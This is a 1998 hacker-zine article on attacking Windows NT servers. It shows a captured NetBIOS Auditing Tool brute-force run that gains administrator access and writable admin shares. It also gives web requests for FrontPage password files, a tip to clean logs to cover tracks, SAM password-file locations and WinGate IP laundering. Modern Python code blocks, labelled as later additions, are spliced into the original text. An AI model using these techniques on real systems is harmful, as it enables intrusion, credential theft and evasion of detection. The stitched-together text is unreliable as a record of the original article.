*SWAT MAGAZINE ISSUE TWELVE: DECEMBER 1998*
**********************************************************************
|                  .Various notes on Windows NT.                      |
|                          By Netw0rk bug                             |
-----------------------------------------------------------------------

=Contents=

Notes On DLL Files
TCP/UDP Port Numbers
Notes On The NAT Command
RPC - Remote Procedure Calls
The FrontPage Service Password
Notes On WinGate
Recognising NT Servers
NT Accounts And Passwords
The NT Password File
Notes On NETBIOS

=========================================================================
NOTES ON DLL FILES
=========================================================================

Authentication (GINA) module, specifically MSGINA.DLL. Under certain
conditions, this file can be replaced, which is how you would change
the SAS key combination.

-------------------------------------------------------------------------

Windows NT 4.0 Service Pack 2 and later includes a password filter DLL
file (Passfilt.dll) that lets you enforce stronger password requirements
for users. Passfilt.dll provides enhanced security against "password
guessing" or "dictionary attacks" by outside intruders.

Passfilt.dll implements the following password policy:

- Passwords must be at least six (6) characters long. (The minimum
  password length can be increased further by setting a higher value in
  the Password Policy for the domain).

- Passwords must contain characters from at least three (3) of the
  following four (4) classes:

    Description                                Examples
    English upper case letters                 A, B, C, ... Z
    English lower case letters                 a, b, c, ... z
    Westernized Arabic numerals                0, 1, 2, ... 9
    Non-alphanumeric ("special characters")    such as punctuation symbols

- Passwords may not contain your user name or any part of your full
  name.

These requirements are hard-coded in the Passfilt.dll file and cannot be
changed through the user interface or registry.
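The three Passfilt.dll rules above, written out as an added Python example (not Microsoft's code and not part of the original article). How the full name is split into parts, the three-character minimum for a part, and the case-insensitive comparison are assumptions.

```python
import re

MIN_LENGTH = 6          # minimum length stated in the article
REQUIRED_CLASSES = 3    # at least three of the four character classes

# Assumption: the full name is split on these delimiters and only parts of
# three or more characters are compared against the password.
NAME_DELIMITERS = re.compile(r"[\s,.\-_#]+")
MIN_NAME_PART = 3


def character_classes(password):
    """Return which of the four classes from the policy occur in the password."""
    classes = set()
    for ch in password:
        if "A" <= ch <= "Z":
            classes.add("upper")
        elif "a" <= ch <= "z":
            classes.add("lower")
        elif "0" <= ch <= "9":
            classes.add("digit")
        elif not ch.isalnum():
            classes.add("special")
        # Letters outside A-Z/a-z count toward none of the four classes.
    return classes


def check_password(password, username, full_name=""):
    """Return the list of rules the password breaks; empty means accepted."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append("too short")
    if len(character_classes(password)) < REQUIRED_CLASSES:
        problems.append("too few character classes")
    lowered = password.lower()
    if username and username.lower() in lowered:
        problems.append("contains user name")
    parts = [p for p in NAME_DELIMITERS.split(full_name) if len(p) >= MIN_NAME_PART]
    if any(p.lower() in lowered for p in parts):
        problems.append("contains part of full name")
    return problems


if __name__ == "__main__":
    # Constructed test accounts and passwords.
    for pw, user, name in [
        ("apple", "Vacuum", ""),
        ("abcdef12", "bob", "Bob Jones"),
        ("Smith#2024", "jsmith", "John Smith"),
        ("Tr1cky!pw", "jsmith", "John Smith"),
    ]:
        print(f"{pw!r:14} {check_password(pw, user, name) or 'accepted'}")
```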
If you wish to raise or lower these requirements, you may write your own
.dll and implement it in the same fashion as the Microsoft version that
is available with Windows NT 4.0 Service Pack 2.

=========================================================================
TCP/UDP PORT NUMBERS
=========================================================================

Service         Port        Comments

TCP Ports

echo            7/tcp
discard         9/tcp       sink null
systat          11/tcp      users
daytime         13/tcp
netstat         15/tcp
qotd            17/tcp      quote
chargen         19/tcp      ttytst source
ftp-data        20/tcp
ftp             21/tcp
telnet          23/tcp
smtp            25/tcp      mail
time            37/tcp      timserver
name            42/tcp      nameserver
whois           43/tcp      nicname
nameserver      53/tcp      domain
apts            57/tcp      any private terminal service
apfs            59/tcp      any private file service
rje             77/tcp      netrjs
finger          79/tcp
http            80/tcp
link            87/tcp      ttylink
supdup          95/tcp
newacct         100/tcp     [unauthorized use]
hostnames       101/tcp     hostname
iso-tsap        102/tcp     tsap
x400            103/tcp
x400-snd        104/tcp
csnet-ns        105/tcp     CSNET Name Service
pop-2           109/tcp     Post Office Protocol version 2
pop-3           110/tcp     Post Office Protocol version 3
sunrpc          111/tcp
auth            113/tcp     authentication
sftp            115/tcp
uucp-path       117/tcp
nntp            119/tcp     usenet readnews untp
ntp             123/tcp     network time protocol
statsrv         133/tcp
profile         136/tcp
NeWS            144/tcp     news
print-srv       170/tcp
https           443/tcp     Secure HTTP
exec            512/tcp     remote process execution; authentication
                            performed using passwords and UNIX login names
login           513/tcp     remote login a la telnet; automatic
                            authentication performed based on privileged
                            port numbers and distributed data bases which
                            identify "authentication domains"
cmd             514/tcp     like exec, but automatic authentication is
                            performed as for login server
printer         515/tcp     spooler
efs             520/tcp     extended file name server
tempo           526/tcp     newdate
courier         530/tcp     rpc
conference      531/tcp     chat
netnews         532/tcp     readnews
uucp            540/tcp     uucpd
klogin          543/tcp
kshell          544/tcp     krcmd
dsf             555/tcp
remotefs        556/tcp     rfs server
chshell         562/tcp     chcmd
meter           570/tcp     demon
pcserver        600/tcp     Sun IPC server
nqs             607/tcp     nqs
mdqs            666/tcp
rfile           750/tcp
pump            751/tcp
qrh             752/tcp
rrh             753/tcp
tell            754/tcp     send
nlogin          758/tcp
con             759/tcp
ns              760/tcp
rxe             761/tcp
quotad          762/tcp
cycleserv       763/tcp
omserv          764/tcp
webster         765/tcp
phonebook       767/tcp     phone
vid             769/tcp
rtip            771/tcp
cycleserv2      772/tcp
submit          773/tcp
rpasswd         774/tcp
entomb          775/tcp
wpages          776/tcp
wpgs            780/tcp
mdbs            800/tcp
device          801/tcp
maitrd          997/tcp
busboy          998/tcp
garcon          999/tcp
blackjack       1025/tcp    network blackjack
bbn-mmc         1347/tcp    multi media conferencing
bbn-mmx         1348/tcp    multi media conferencing
orasrv          1525/tcp    oracle
ingreslock      1524/tcp
issd            1600/tcp
nkd             1650/tcp
dc              2001/tcp
mailbox         2004/tcp
berknet         2005/tcp
invokator       2006/tcp
dectalk         2007/tcp
conf            2008/tcp
news            2009/tcp
search          2010/tcp
raid-cc         2011/tcp    raid
ttyinfo         2012/tcp
raid-am         2013/tcp
troff           2014/tcp
cypress         2015/tcp
cypress-stat    2017/tcp
terminaldb      2018/tcp
whosockami      2019/tcp
servexec        2021/tcp
down            2022/tcp
ellpack         2025/tcp
shadowserver    2027/tcp
submitserver    2028/tcp
device2         2030/tcp
blackboard      2032/tcp
glogger         2033/tcp
scoremgr        2034/tcp
imsldoc         2035/tcp
objectmanager   2038/tcp
lam             2040/tcp
interbase       2041/tcp
isis            2042/tcp
rimsl           2044/tcp
dls             2047/tcp
dls-monitor     2048/tcp
shilp           2049/tcp
NSWS            3049/tcp
rfa             4672/tcp    remote file access server
complexmain     5000/tcp
complexlink     5001/tcp
padl2sim        5236/tcp
man             9535/tcp

UDP Ports

echo            7/udp
discard         9/udp       sink null
systat          11/udp      users
daytime         13/udp
netstat         15/udp
qotd            17/udp      quote
chargen         19/udp      ttytst source
time            37/udp      timserver
rlp             39/udp      resource
name            42/udp      nameserver
whois           43/udp      nicname
nameserver      53/udp      domain
bootps          67/udp      bootp
bootpc          68/udp
tftp            69/udp
sunrpc          111/udp
erpc            121/udp
ntp             123/udp
statsrv         133/udp
profile         136/udp
snmp            161/udp
snmp-trap       162/udp
at-rtmp         201/udp
at-nbp          202/udp
at-3            203/udp
at-echo         204/udp
at-5            205/udp
at-zis          206/udp
at-7            207/udp
at-8            208/udp
biff            512/udp     used by mail system to notify users of new
                            mail received; currently receives messages
                            only from processes on the same machine
who             513/udp     maintains data bases showing who's logged in
                            to machines on a local net and the load
                            average of the machine
syslog          514/udp
talk            517/udp     like tenex link, but across machine -
                            unfortunately, doesn't use link protocol
                            (this is actually just a rendezvous port from
                            which a tcp connection is established)
ntalk           518/udp
utime           519/udp     unixtime
router          520/udp     local routing process (on site); uses variant
                            of Xerox NS routing information protocol
timed           525/udp     timeserver
netwall         533/udp     for emergency broadcasts
new-rwho        550/udp     new-who
rmonitor        560/udp     rmonitord
monitor         561/udp
meter           571/udp     udemon
elcsd           704/udp     errlog copy/server daemon
loadav          750/udp
vid             769/udp
cadlock         770/udp
notify          773/udp
acmaint_dbd     774/udp
acmaint_trnsd   775/udp
wpages          776/udp
puparp          998/udp
applix          999/udp     Applix ac
puprouter       999/udp
cadlock         1000/udp
hermes          1248/udp
wizard          2001/udp    curry
globe           2002/udp
emce            2004/udp    CCWS mm conf
oracle          2005/udp
raid-cc         2006/udp    raid
raid-am         2007/udp
terminaldb      2008/udp
whosockami      2009/udp
pipe_server     2010/udp
servserv        2011/udp
raid-ac         2012/udp
raid-cd         2013/udp
raid-sf         2014/udp
raid-cs         2015/udp
bootserver      2016/udp
bootclient      2017/udp
rellpack        2018/udp
about           2019/udp
xinupagesrver   2020/udp
xinuexpnsion1   2021/udp
xinuexpnsion2   2022/udp
xinuexpnsion3   2023/udp
xinuexpnsion4   2024/udp
xribs           2025/udp
scrabble        2026/udp
isis            2042/udp
isis-bcast      2043/udp
rimsl           2044/udp
cdfunc          2045/udp
sdfunc          2046/udp
dls             2047/udp
shilp           2049/udp
rmontor_scure   5145/udp
xdsxdm          6558/udp
isode-dua       17007/udp

=========================================================================
NOTES ON THE NAT COMMAND
=========================================================================

NAT.EXE [-o filename] [-u userlist] [-p passlist]

Switches:

    -o    Specify the output file. All results from the scan will be
          written to the specified file, in addition to standard output.

    -u    Specify the file to read usernames from. Usernames will be
          read from the specified file when attempting to guess the
          password on the remote server. Usernames should appear one
          per line in the specified file.

    -p    Specify the file to read passwords from. Passwords will be
          read from the specified file when attempting to guess the
          password on the remote server. Passwords should appear one
          per line in the specified file.

Addresses should be specified in comma delimited format, with no
spaces. Valid address specifications include:

    hostname - "hostname" is added

    127.0.0.1-127.0.0.3, adds addresses 127.0.0.1 through 127.0.0.3

    127.0.0.1-3, adds addresses 127.0.0.1 through 127.0.0.3

    127.0.0.1-3,7,10-20, adds addresses 127.0.0.1 through 127.0.0.3,
    127.0.0.7, 127.0.0.10 through 127.0.0.20.

    hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1 through
    127.0.0.1

All combinations of hostnames and address ranges as specified above are
valid.

Here is an actual example of how the NAT.EXE program is used. The
information listed here is an actual capture of the activity. The IP
addresses have been changed to protect, well, us.

C:\nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY

[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt
[*]--- Checking host: XXX.XX.XXX.XX
[*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Obtained server information:

Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]

[*]--- Obtained listing of shares:

    Sharename      Type      Comment
    ---------      ----      -------
    ADMIN$         Disk:     Remote Admin
    C$             Disk:     Default share
    IPC$           IPC:      Remote IPC
    NETLOGON       Disk:     Logon server share
    Test           Disk:

[*]--- This machine has a browse list:

    Server         Comment
    ---------      -------
    STUDENT1

[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access

If the default share of Everyone/Full Control is active, then you are
done, the server is hacked. If not, keep playing. You will be surprised
what you find out.

=========================================================================
RPC (REMOTE PROCEDURE CALLS)
=========================================================================

In order for NT to allow for various system services to be performed on
a remote computer, it uses RPC, remote procedure calls. Please do not
confuse this with SunRPC. You can run NT/RPC's over a NetBIOS/SMB
session or you can piggyback it directly off of TCP/IP (or other
transport protocol, perhaps NWLink IPX/SPX).

Unfortunately we don't have any good documentation on what inherent
services NT provides through native RPC. Complex server type programs
(like Exchange) provide their own RPC services in addition to the ones
NT provides as an operating system --(TCP Port 135 is used as a
port-mapper port, we also know that if too much information is fed
through port 135, you can crash an NT box.). Some client software must
access TCP port 135 before accessing the RPC service itself (hint,
hint). Keep in mind that TCP port 135 can be blocked. Bummer, eh?

=========================================================================
THE FRONTPAGE SERVICE PASSWORD
=========================================================================

The haccess.ctl file is sometimes called a shadow password file; this
is not exactly correct. The file can give you a lot of information,
including the location of the service password file. A complete example
of the haccess.ctl file is given below:

The #haccess.ctl file:

    # -FrontPage-
    Options None
    order deny,allow
    deny from all
    AuthName default_realm
    AuthUserFile c:/frontpage\ webs/content/_vti_pvt/service.pwd
    AuthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.grp

Executing fpservwin.exe allows FrontPage server extensions to be
installed on

    port 443 (HTTPS) Secure Sockets Layer
    port 80 (HTTP)

NOTE: The Limit line. Telneting to port 80 or 443 and using GET, POST,
and PUT can be used instead of FrontPage.
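Requests for the FrontPage files named in this section leave a trace in the web server's access log. The following added Python example (not part of the original article) scans log lines for them and separates files the server actually returned from probes it refused; it assumes NCSA Common Log Format, and the sample log lines are constructed.

```python
import re
from urllib.parse import unquote

# Path fragments named in the article, mapped to what a hit means.
WATCHED = {
    "_vti_pvt/service.pwd": "password file",
    "_vti_pvt/service.grp": "group file",
    "_vti_pvt/authors.pwd": "password file",
    "_vti_pvt/administrators.pwd": "password file",
    "_vti_pvt/users.pwd": "password file",
    "_vti_log/author.log": "authoring log",
    "_vti_inf.html": "extension fingerprint",
    "samples/search/queryhit.htm": "Index Server sample",
}

# host ident user [time] "METHOD target PROTOCOL" status bytes
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')

# Constructed sample log using documentation addresses, not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Dec/1998:07:44:34 -0600] "GET /_vti_pvt/service.pwd HTTP/1.0" 200 62
192.0.2.10 - - [01/Dec/1998:07:44:36 -0600] "GET /_vti_pvt/authors.pwd HTTP/1.0" 404 0
192.0.2.10 - - [01/Dec/1998:07:44:39 -0600] "GET /%5Fvti%5Fpvt/SERVICE.PWD HTTP/1.0" 403 0
198.51.100.7 - - [01/Dec/1998:08:01:02 -0600] "GET /index.html HTTP/1.0" 200 1043
198.51.100.7 - - [01/Dec/1998:08:01:05 -0600] "GET /_vti_inf.html HTTP/1.0" 200 310
192.0.2.10 - - [01/Dec/1998:07:45:10 -0600] "GET /_vti_log/author.log HTTP/1.0" 200 2048
""".splitlines()


def normalise(target):
    """Decode %XX once, drop the query string, unify slashes and case."""
    path = unquote(target.split("?", 1)[0]).replace("\\", "/").lower()
    return re.sub(r"/+", "/", path)


def scan(lines):
    """Return one finding per request that touches a watched path."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, when, method, target, status = m.groups()
        path = normalise(target)
        for needle, kind in WATCHED.items():
            if needle in path:
                findings.append({"client": client, "time": when, "path": path,
                                 "kind": kind, "status": int(status),
                                 "served": status.startswith("2")})
                break
    return findings


def exposed_files(findings):
    """Sensitive paths the server returned: lock these down, rotate passwords."""
    return sorted({f["path"] for f in findings
                   if f["served"] and f["kind"] != "extension fingerprint"})


def probing_clients(findings, threshold=2):
    """Clients that requested watched paths at least `threshold` times."""
    counts = {}
    for f in findings:
        counts[f["client"]] = counts.get(f["client"], 0) + 1
    return sorted(c for c, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    print("exposed:", exposed_files(hits))
    print("probing:", probing_clients(hits))
```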

The following is a list of the Internet Information Server file
locations in relation to the local hard drive (C:) and the web
(www.target.com):

    C:\InetPub\wwwroot
    C:\InetPub\scripts                          /Scripts
    C:\InetPub\wwwroot\_vti_bin                 /_vti_bin
    C:\InetPub\wwwroot\_vti_bin\_vti_adm        /_vti_bin/_vti_adm
    C:\InetPub\wwwroot\_vti_bin\_vti_aut        /_vti_bin/_vti_aut
    C:\InetPub\cgi-bin                          /cgi-bin
    C:\InetPub\wwwroot\srchadm                  /srchadm
    C:\WINNT\System32\inetserv\iisadmin         /iisadmin
    C:\InetPub\wwwroot\_vti_pvt

FrontPage creates a directory _vti_pvt for the root web and for each
FrontPage sub-web. For each FrontPage web with unique permissions, the
_vti_pvt directory contains two files for the FrontPage web that the
access file points to:

    service.pwd    contains the list of users and passwords for the
                   FrontPage web.
    service.grp    contains the list of groups (one group for authors
                   and one for administrators in FrontPage).

On Netscape servers, there are no service.grp files. The Netscape
password files are:

    administrators.pwd    for administrators
    authors.pwd           for authors and administrators
    users.pwd             for users, authors, and administrators

C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM
    Internet Information Index Server sample

If Index Information Server is running under Internet Information
Server: service.pwd (or any other file) can sometimes be retrieved.
Search for "#filename=*.pwd"

    C:\Program Files\Microsoft FrontPage\_vti_bin
    C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut
    C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm
    C:\WINNT\System32\inetserv\iisadmin\htmldocs\admin.htm    /iisadmin/isadmin

C:\InetPub\ftproot
    The default location for the ftp

The ftp service by default runs on the standard port 21. Check to see
if anonymous connections are allowed. By default, Internet Information
Server creates and uses the account IUSR_computername for all anonymous
logons. Note that the password is used only within Windows NT;
anonymous users do not log on using this user name and password.
Typically, anonymous FTP users will use "anonymous" as the user name
and their e-mail address as the password. The FTP service then uses the
IUSR_computername account as the logon account for permissions. When
installed, Internet Information Server's Setup created the account
IUSR_computername in the Windows NT User Manager for Domains and in
Internet Service Manager. This account was assigned a random password
in both Internet Service Manager and the Windows NT User Manager for
Domains. If you change the password, you must change it in both places
and make sure it matches.

NOTE: Name and password are case sensitive

Scanning PORT 80 (http) or 443 (https) options:

    GET /__vti_inf.html               #Ensures that frontpage server
                                      extensions are installed.
    GET /_vti_pvt/service.pwd         #Contains the encrypted password
                                      files. Not used on IIS and WebSite
                                      servers
    GET /_vti_pvt/authors.pwd         #On Netscape servers only.
                                      Encrypted names and passwords of
                                      authors.
    GET /_vti_pvt/administrators.pwd
    GET /_vti_log/author.log          #If author.log is there it will
                                      need to be cleaned to cover your
                                      tracks
    GET /samples/search/queryhit.htm

If service.pwd is obtained it will look similar to this:

    Vacuum:SGXJVl6OJ9zkE

The above password is apple

Turn it into DES format:

    Vacuum:SGXJVl6OJ9zkE:10:200:Vacuum:/users/Vacuum:/bin/bash

Other ways of obtaining service.pwd:

    http://ftpsearch.com/index.html
        search for service.pwd
    http://www.alstavista.digital.com
        advanced search for link:"/_vti_pvt/service.pwd"

=========================================================================
NOTES ON WINGATE
=========================================================================

When you do a regular install of WinGate without changing things there
are a few defaults:

    Port:  | Service:
    23       Telnet Proxy Server - This is default and running right
             after install.
    1080     SOCKS Server - This once setup via GateKeeper has no
             password until you set one.
    6667     IRC Mapping - This once setup via GateKeeper has no
             password until you set one.

The biggest threat to your server is the port 23 telnet proxy.

Port 1080 SOCKS Proxy

The SOCKS proxy is not installed by default, but as soon as you use
GateKeeper to install it, it installs with no password unless you set
one. If you are familiar with SOCKS you know that there are many things
you could do with it.

Port 6667 IRC Proxy

The IRC proxy is like how we would do a WinGate telnet proxy bounce to
an IRC server, except the IRC proxy is set to go to a certain server
already. This is not set to run after install, but after you do install
it, it sets up with no password unless you set one.

Mr. Rodd. He had discovered this bug, had written an exploit for it,
and had written a netscanner which would comb a specified netblock
looking for vulnerable WinGate hosts. He managed to find that if one
telnets to a WinGate host that is not properly secured (which was,
until a week or so ago, the default state of these servers), one could
telnet into and then back out of the WinGate server, which would
"launder" one's actual IP address. Thereafter, if one mounted an attack
on another machine, or if one sent e-mail by "hijacking" an open SMTP
server, one would seem to be coming from the location of the WinGate
server. This exploit was used to harass anti-spammers with untraceable
e-mail, but one could well imagine that it could be used for a variety
of other attacks.

=========================================================================
RECOGNISING NT SERVERS
=========================================================================

[11.2.1] How can I tell if it's an NT box?

Hopefully it is a web server, and they've simply stated proudly "we're
running NT", but don't expect that...

Port scanning will find some. Typically you'll see port 135 open. This
is no guarantee it's not Windows 95, however.
Using Samba you should be able to connect and query for the existence
of HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT and then check
\CurrentVersion\CurrentVersion to determine the version running. If
guest is enabled, try this first as Everyone has read permissions here
by default.

Port 137 is used for running NetBios over IP, and since in the Windows
world NetBios is used, certainly you can expect port 137 to be open if
IP is anywhere in use around NT.

Another possible indication is checking for port 139. This tells you
your target is advertising an SMB resource to share info, but it could
be any number of things, such as a Windows 95 machine or even Windows
for Workgroups. These may not be entirely out of the question as
potential targets, but if you are after NT you will have to use a
combination of the aforementioned techniques coupled with some common
sense.

To simplify this entire process, Secure Networks Inc. has a freeware
utility called NetBios Auditing Tool. This tool's intent is to test
NetBios file sharing configurations and passwords on remote systems.

=========================================================================
NT ACCOUNTS AND PASSWORDS
=========================================================================

There are two accounts that come with NT out of the box – administrator
and guest. In a network environment, I have run into local
administrator access unpassworded, since the Sys Admin thought that
global accounts ruled over local ones. Therefore it is possible to gain
initial access to an NT box by using its local administrator account
with no password.

Guest is another common unpassworded account, although recent shipments
of NT disable the account by default. While it is possible that some
companies will delete the guest account, some applications require it.
If Microsoft Internet Studio needs to access data on another system, it
will use guest for that remote access.

You will find that by default all accounts in NT have complete SMB
functionality. This includes the Guest account. (In WinNT 3.51, the
guest is auto created and active; in WinNT 4.0, the guest account is
auto created but is not active.)

Now, 2 things to remember: when it comes to login attempt failures, the
administrator account IS NEVER locked out after a certain number of
login attempts (this rule ALWAYS applies); also, by default, when
Windows NT is installed, NONE of the accounts have failed login attempt
lock out.

Also, in order for SMB to work, UDP/TCP ports 137,138,139 (NetBIOS over
TCP) must be ope

=========================================================================
THE NT PASSWORD FILE
=========================================================================

Accessing the password file in NT

The location of what you need is in \\WINNT\SYSTEM32\CONFIG\SAM which
is the location of the security database. This is usually world
readable by default, but locked since it is in use by system
components. It is possible that there are SAM.SAV files which could be
readable. If so, these could be obtained for the purpose of getting
password info.

During the installation of NT a copy of the password database is put in
\\WINNT\REPAIR. Since it was just installed, only the Administrator and
Guest accounts will be there, but maybe Administrator is enough --
especially if the Administrator password is not changed after
installation.

=========================================================================
NOTES ON NETBIOS
=========================================================================

NetBIOS over TCP/IP should normally be disabled for a firewall or web
server. The following is a list of the ports used by NBT.

- NetBIOS-ns     137/tcp    NETBIOS Name Service
- NetBIOS-ns     137/udp    NETBIOS Name Service
- NetBIOS-dgm    138/tcp    NETBIOS Datagram Service
- NetBIOS-dgm    138/udp    NETBIOS Datagram Service
- NetBIOS-ssn    139/tcp    NETBIOS Session Service
- NetBIOS-ssn    139/udp    NETBIOS Session Service

What exactly does the NetBios Auditing Tool do?

Developed by Secure Networks Inc., it comes in pre-compiled Win32
binary form as well as the complete source code. It is the "SATAN" of
NetBios based systems.

Here is a quote from Secure Networks Inc about the product -

"The NetBIOS Auditing Tool (NAT) is designed to explore the NETBIOS
file-sharing services offered by the target system. It implements a
stepwise approach to gather information and attempt to obtain file
system-level access as though it were a legitimate local client.

The major steps are as follows:

A UDP status query is sent to the target, which usually elicits a reply
containing the Netbios "computer name". This is needed to establish a
session. The reply also can contain other information such as the
workgroup and account names of the machine's users. This part of the
program needs root privilege to listen for replies on UDP port 137,
since the reply is usually sent back to UDP port 137 even if the
original query came from some different port.

TCP connections are made to the target's Netbios port [139], and
session requests using the derived computer name are sent across.
Various guesses at the computer name are also used, in case the status
query failed or returned incomplete information. If all such attempts
to establish a session fail, the host is assumed invulnerable to
NETBIOS attacks even if TCP port 139 was reachable.

Provided a connection is established Netbios "protocol levels" are now
negotiated across the new connection. This establishes various modes
and capabilities the client and server can use with each other, such as
password encryption and if the server uses user-level or share-level
Security. The usable protocol level is deliberately limited to LANMAN
version 2 in this case, since that protocol is somewhat simpler and
uses a smaller password keyspace than NT.

If the server requires further session setup to establish credentials,
various defaults are attempted. Completely blank usernames and
passwords are often allowed to set up "guest" connections to a server;
if this fails then guesses are tried using fairly standard account
names such as ADMINISTRATOR, and some of the names returned from the
status query. Extensive username/password checking is NOT done at this
point, since the aim is just to get the session established, but it
should be noted that if this phase is reached at all MANY more guesses
can be attempted and likely without the owner of the target being
immediately aware of it.

Once the session is fully set up, transactions are performed to collect
more information about the server including any file system "shares" it
offers.

Attempts are then made to connect to all listed file system shares and
some potentially unlisted ones. If the server requires passwords for
the shares, defaults are attempted as described above for session
setup. Any successful connections are then explored for writeability
and some well-known file-naming problems [the ".." class of bugs].

If a NETBIOS session can be established at all via TCP port 139, the
target is declared "vulnerable" with the remaining question being to
what extent. Information is collected under the appropriate
vulnerability at most of these steps, since any point along the way be
blocked by the Security configurations of the target. Most Microsoft-OS
based servers and Unix SAMBA will yield computer names and share lists,
but not allow actual file-sharing connections without a valid username
and/or password. A remote connection to a share is therefore a possibly
serious Security problem, and a connection that allows WRITING to the
share almost certainly so. Printer and other "device" services offered
by the server are currently ignored."

If you need more info on NAT, try looking at this web location:

    http://www.secnet.com/ntinfo/ntaudit.html
    http://www.rhino9.org
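For an administrator who runs NAT against their own servers, the report lines shown in the capture earlier can be reduced to a per-host summary ranked the way the vendor's description ranks them (session, share readable, share writable). This is an added Python example, not part of the original article or of NAT itself; the sample report is constructed in the capture's line format, and the rating labels are this example's own.

```python
import re

PATTERNS = {
    "host": re.compile(r"Checking host: (\S+)"),
    "session": re.compile(r"CONNECTED with name: "),
    "login": re.compile(r"CONNECTED: Username: `([^']*)'"),
    "readable": re.compile(r"WARNING: Able to access share: (\S+)"),
    "writable": re.compile(r"WARNING: Directory is writeable: (\S+)"),
}

# Constructed report modelled on the capture; documentation addresses only.
SAMPLE_REPORT = r"""
[*]--- Checking host: 192.0.2.15
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Was not able to establish session with no password
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
[*]--- Checking host: 192.0.2.16
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Was not able to establish session with no password
[*]--- Checking host: 192.0.2.17
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
"""


def parse_report(text):
    """Group report lines by host. Only the account name of a guessed login
    is kept; the password is deliberately not copied into the summary."""
    hosts, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith("[*]---"):
            continue
        m = PATTERNS["host"].search(line)
        if m:
            current = hosts.setdefault(m.group(1), {
                "session": False, "accounts": [], "readable": [], "writable": []})
            continue
        if current is None:
            continue
        if PATTERNS["session"].search(line):
            current["session"] = True
        m = PATTERNS["login"].search(line)
        if m and m.group(1) not in current["accounts"]:
            current["accounts"].append(m.group(1))
        for key in ("readable", "writable"):
            m = PATTERNS[key].search(line)
            if m:
                share = m.group(1).rsplit("\\", 1)[-1]  # \\*SMBSERVER\ADMIN$ -> ADMIN$
                if share not in current[key]:
                    current[key].append(share)
    return hosts


def rate(host):
    """Rank a host by the furthest step the report shows was reached."""
    if host["writable"]:
        return "write access to a share"
    if host["readable"]:
        return "read access to a share"
    if host["session"]:
        return "session only"
    return "no session"


if __name__ == "__main__":
    for address, host in parse_report(SAMPLE_REPORT).items():
        print(address, rate(host), host["accounts"], host["writable"])
```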